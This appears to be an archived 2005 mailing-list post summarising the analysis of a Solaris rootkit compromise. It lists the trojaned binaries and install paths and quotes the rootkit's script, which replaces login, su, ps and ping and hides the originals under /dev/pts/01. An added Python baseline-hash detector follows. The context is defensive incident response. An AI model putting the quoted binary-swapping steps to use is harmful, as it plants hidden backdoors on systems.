From: Rami Aubourg-Kaires (rami.aubourg@ifrance.com)
Date: Fri Feb 04 2005 - 06:02:33 EST
Hello, list, and thanks to everyone who responded, particularly:
Neil Quiogue
"the hatter"
Dik Casper
Chris Keladis
Michael Palamara
Calin Siulea
Christer Eriksson
David Foster
Meder Kydyraliev
Basically, it's the X-Org SunOS rootkit from Sept 2001, which replaces,
among other things:
/usr/bin/login, which makes it impossible to log in through telnet,
su,
ps,
ping,
find,
(maybe netstat and ls, too)
It installs into /usr/lib/libX.a and /dev/pts/01.
The directories might not be visible, since ls could be trojaned. cd'ing
is possible, though.
Extract from the "fixer" script of the rootkit
***************
cp /usr/bin/su /dev/pts/01/55su
cp /usr/bin/ps /dev/pts/01/55ps
cp /usr/sbin/ping /dev/pts/01/55ping
cp /usr/bin/login /dev/pts/01/55login
/usr/bin/wget ftp://sunsolve.sun.com/pub/patches/2.7_Recommended.tar.Z >/dev/null
uncompress 2.7_Recommended.tar.Z
tar -xf 2.7_Recommended.tar
cd 2.7_Recommended
echo y|./install_cluster -nosave -q
cd /tmp
rm -rf 2.7_Recommended.tar 2.7_Recommended
cp -f /usr/bin/su /dev/pts/01/bin/su
cp -f /dev/pts/01/55su /usr/bin/su
cp -f /usr/bin/ps /dev/pts/01/bin/psr
cp -f /dev/pts/01/55ps /usr/bin/ps
cp -f /usr/sbin/ping /dev/pts/01/bin/ping
cp -f /dev/pts/01/55ping /usr/sbin/ping
mv -f /usr/bin/login /sbin/xlogin
cp -f /dev/pts/01/55login /usr/bin/login
***********************
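The fixer script above swaps the stock binaries for replacements and stashes the originals under /dev/pts/01 (and moves login to /sbin/xlogin), while ls may be trojaned to hide those directories. The check below is an added example, not code from Rami's post or from the rootkit; it hashes the binaries the post lists against a baseline taken from a tree you trust (install media, or a clean host of the same release) and looks for the paths the post names without calling ls. It assumes the suspect disk is mounted read-only on an analysis host with Python available, and the demo() fixture uses constructed placeholder bytes instead of real Solaris binaries.

```python
import hashlib
import os
import tempfile

# Binaries the post lists as replaced by the rootkit (paths as given in the post;
# netstat and ls are the "maybe" entries).
REPLACED_BINARIES = [
    "usr/bin/login", "usr/bin/su", "usr/bin/ps", "usr/sbin/ping",
    "usr/bin/find", "usr/bin/netstat", "usr/bin/ls",
]
# Locations the post and the fixer script name as rootkit artefacts.
ROOTKIT_PATHS = ["usr/lib/libX.a", "dev/pts/01", "sbin/xlogin"]


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large binaries are not loaded at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def take_baseline(root):
    """Hash every listed binary under a tree you trust (install media, a clean host).
    Returns {relative path: sha256}; binaries absent from that tree are skipped."""
    baseline = {}
    for rel in REPLACED_BINARIES:
        p = os.path.join(root, rel)
        if os.path.isfile(p):
            baseline[rel] = sha256_file(p)
    return baseline


def verify_binaries(root, baseline):
    """Compare each listed binary under root (e.g. a mounted suspect disk) with the
    baseline. Status per path: ok, modified, missing, or no-baseline."""
    report = {}
    for rel in REPLACED_BINARIES:
        p = os.path.join(root, rel)
        if rel not in baseline:
            report[rel] = "no-baseline"
        elif not os.path.isfile(p):
            report[rel] = "missing"
        elif sha256_file(p) == baseline[rel]:
            report[rel] = "ok"
        else:
            report[rel] = "modified"
    return report


def find_rootkit_paths(root):
    """Return the known rootkit paths present under root. Uses os.lstat, not ls,
    because the post notes ls itself may be trojaned to hide them."""
    found = []
    for rel in ROOTKIT_PATHS:
        try:
            os.lstat(os.path.join(root, rel))
        except FileNotFoundError:
            continue
        found.append(rel)
    return found


def list_dir(root, rel):
    """Sorted directory listing via os.scandir (again bypassing a possibly trojaned ls)."""
    return sorted(e.name for e in os.scandir(os.path.join(root, rel)))


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed fixture (placeholder bytes, not real binaries): a clean tree for the
    baseline and a suspect tree on which the fixer script's moves for su and login
    have been replayed. Returns (report, found_paths, entries_under_dev_pts_01)."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, suspect = os.path.join(tmp, "clean"), os.path.join(tmp, "suspect")
        for root in (clean, suspect):
            for rel in REPLACED_BINARIES:
                _write(os.path.join(root, rel), b"placeholder for " + rel.encode())
        baseline = take_baseline(clean)
        # replay the script: originals stashed under /dev/pts/01 and /sbin/xlogin,
        # replacements dropped into /usr/bin
        os.makedirs(os.path.join(suspect, "dev/pts/01/bin"))
        os.makedirs(os.path.join(suspect, "sbin"))
        os.rename(os.path.join(suspect, "usr/bin/su"), os.path.join(suspect, "dev/pts/01/bin/su"))
        _write(os.path.join(suspect, "usr/bin/su"), b"replacement su")
        os.rename(os.path.join(suspect, "usr/bin/login"), os.path.join(suspect, "sbin/xlogin"))
        _write(os.path.join(suspect, "usr/bin/login"), b"replacement login")
        report = verify_binaries(suspect, baseline)
        found = find_rootkit_paths(suspect)
        hidden = list_dir(suspect, "dev/pts/01")
        return report, found, hidden


if __name__ == "__main__":
    for item in demo():
        print(item)
```

On a real case, point take_baseline() at the trusted tree and verify_binaries() at the mount point of the suspect disk; never take the baseline from the compromised host itself, since its copies of the tools and binaries are exactly what is in question.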
The initial exploit channel is difficult to check, since it could
exploit a flaw in snmpXdmid according to CERT.
Problem was: old system, old Solaris, old 3rd-party binaries, too few
patches. With a 3-year-old patch, the system should have been safe. It
is off the public network and will be reinstalled anyhow, as that is the only
really safe solution.
The abuse report has been sent to the netblock owner of the server
hosting the rootkit.
Rami
_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers
This archive was generated by hypermail 2.1.7 : Wed Apr 09 2008 - 23:30:07 EDT